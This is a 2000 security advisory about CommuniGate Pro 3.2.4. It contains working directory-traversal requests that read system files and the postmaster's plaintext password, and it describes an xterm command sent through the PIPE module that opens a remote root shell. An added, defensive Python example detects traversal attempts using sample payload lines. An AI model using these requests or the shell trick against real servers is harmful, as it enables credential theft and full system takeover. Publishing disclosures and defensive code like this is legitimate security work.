Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
From: Lluis Mora (llmora@S21SEC.COM)
Date: Mon Jul 17 2000 - 14:09:41 CDT


###############################################################
ID: S21SEC-003-en
Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
Date: 03/04/2000
Status: Vendor contacted
Scope: Remote command execution as superuser
Platforms: Linux, probably others
Author: llmora, fjserna
Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt
Release: Public
###############################################################

                                S 2 1 S E C

                           http://www.s21sec.com

                Vulnerabilities in Stalker's CommuniGate Pro v3.2.4

About CommuniGate Pro
---------------------

CommuniGate Pro is a full-featured commercial mail server
(http://www.stalker.com/CommuniGatePro/).

It does SMTP message routing, provides POP, IMAP and HTTP access to mail,
etc.

The CommuniGate Pro mail server has a built-in web server that allows
users to read and send e-mail through the web, as well as allowing the
administrator to remotely manage the mail server settings.

By default it opens port 8100/tcp for web users access to mail and port
8010/tcp for web management access.

Vulnerability description
-------------------------

1. Reading any file in the mail server

CommuniGate provides a convenient mapping for the Web User Guide: the URL
prefix /Guide/ is mapped to a directory inside the CommuniGate tree. The
built-in web server suffers from the well-known "../.." (directory
traversal) problem: it does not normalise the path before mapping it to
the filesystem. If we request a document through the /Guide/ mapping of
the administrative web server using the "../.." technique, the server
returns the contents of an arbitrary file:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0

HTTP/1.0 200 OK
[... the /etc/motd file content is shown]

Connection closed by foreign host.
homer:~$

As CommuniGate runs as root and never drops privileges, we can read any
file on the system, e.g. /etc/shadow.

E.g., we can retrieve the postmaster/manager settings file, which
includes the plaintext password to access the management website:

homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
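The two failures above, as an added example that is not part of the advisory and is not CommuniGate's code: a naive prefix-to-directory mapping that leaves "../" for the filesystem to resolve, the hardened resolver that percent-decodes, normalises and then refuses anything outside the mapped root, a scan of request lines for traversal attempts against /Guide/, and a parser for the "{ Key = Value; ... }" dictionary returned for account.settings. The guide directory (GUIDE_ROOT) and the sample request lines are assumptions; the advisory never states where the Web User Guide lives.

```python
"""Added example (not from the S21SEC advisory or from Stalker's code):
naive vs. hardened /Guide/ path mapping, a log scan for traversal
attempts, and a parser for the account.settings dictionary format."""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed install layout: the advisory shows /var/CommuniGate/Accounts/...
# but does not say where the Web User Guide directory is.
GUIDE_ROOT = "/var/CommuniGate/WebGuide"
GUIDE_PREFIX = "/Guide/"


def naive_map(url_path: str) -> str:
    """The broken behaviour: strip the /Guide/ prefix and concatenate.
    '..' segments are passed through, so the kernel resolves them and
    the request escapes GUIDE_ROOT."""
    if not url_path.startswith(GUIDE_PREFIX):
        raise ValueError("not a /Guide/ request")
    return GUIDE_ROOT + "/" + url_path[len(GUIDE_PREFIX):]


def safe_map(url_path: str) -> Optional[str]:
    """Hardened mapping: percent-decode first (so %2e%2e is seen as ..),
    collapse '.' and '..' with normpath, then refuse any result that is
    not GUIDE_ROOT itself or a path below it. Returns None on rejection."""
    decoded = unquote(url_path)
    if not decoded.startswith(GUIDE_PREFIX) or "\x00" in decoded:
        return None
    rel = decoded[len(GUIDE_PREFIX):]
    # posixpath.join discards GUIDE_ROOT if rel is absolute ("/Guide//etc"),
    # which the prefix check below also catches.
    full = posixpath.normpath(posixpath.join(GUIDE_ROOT, rel))
    if full != GUIDE_ROOT and not full.startswith(GUIDE_ROOT + "/"):
        return None
    return full


# Constructed sample request lines (not real server logs).
SAMPLE_REQUESTS = [
    "GET /Guide/index.html HTTP/1.0",
    "GET /Guide/../../../../../../../../../../../etc/motd HTTP/1.0",
    "GET /Guide/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.0",
    "GET /Guide/chapter1/../chapter2.html HTTP/1.0",
]


def traversal_attempts(request_lines: List[str]) -> List[str]:
    """Return the request paths under /Guide/ that the hardened resolver
    rejects, i.e. the ones that would have escaped the guide directory."""
    hits = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        path = parts[1]
        if path.startswith(GUIDE_PREFIX) and safe_map(path) is None:
            hits.append(path)
    return hits


# One "Key = Value;" entry of the settings dictionary shown in the advisory.
SETTING_RE = re.compile(r"\s*([A-Za-z0-9_]+)\s*=\s*([^;]+?)\s*;")


def parse_settings(blob: str) -> dict:
    """Parse '{ ExternalINBOX = NO; Password = 8093; ... }' into a dict."""
    blob = blob.strip()
    if not (blob.startswith("{") and blob.endswith("}")):
        raise ValueError("not a settings dictionary")
    return dict(SETTING_RE.findall(blob[1:-1]))


if __name__ == "__main__":
    evil = "/Guide/../../../../../../../../../../../etc/motd"
    print("naive:", naive_map(evil))        # escapes to /etc/motd
    print("safe: ", safe_map(evil))         # None: rejected
    print("flagged:", traversal_attempts(SAMPLE_REQUESTS))
    print(parse_settings("{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}"))
```

The resolver decodes before normalising because a server that normalises the raw URL and decodes afterwards still lets "%2e%2e" through; the last sample request shows that a ".." which stays inside the guide tree is legitimately accepted.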

2. Remote execution of arbitrary commands as root

This is not a vulnerability in itself but a demonstration of what can be
accomplished once an attacker has obtained the postmaster password.

Looking through the features of CommuniGate, we find the PIPE module. It
allows mail to be delivered to a program on the mail server. It is
disabled by default, but once we can reach the server settings with the
postmaster password we can simply enable it, set the application
directory to /usr/X11R6/bin/, raise the maximum process execution time,
and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe,
which opens an xterm running a root shell on our desktop...

Affected versions and platforms
-------------------------------

This bug has been tested on the Linux (Red Hat and non-Red Hat) v3.2.4
distribution (the latest stable release) found at www.stalker.com. It has
not been tested on other platforms or earlier versions, though we strongly
believe the bug is platform independent and can probably be reproduced in
earlier releases.

Current beta versions (as from v3.3b2) don't suffer from this security
problem.

Fix information
---------------

There is an upcoming stable release (v3.3) that will fix this problem,
and currently the v3.3 betas (v3.3b2 or newer) are patched against this
attack.

Upgrades are available from the vendor website at http://www.stalker.com.

Additional information
----------------------

This vulnerability was found and researched by:

 Lluis Mora llmora@s21sec.com
 Fermin J. Serna fjserna@s21sec.com

You can find the latest version of this advisory at:

        http://www.s21sec.com/en/avisos/s21sec-003-en.txt

And other S21SEC advisories at http://www.s21sec.com/en/avisos/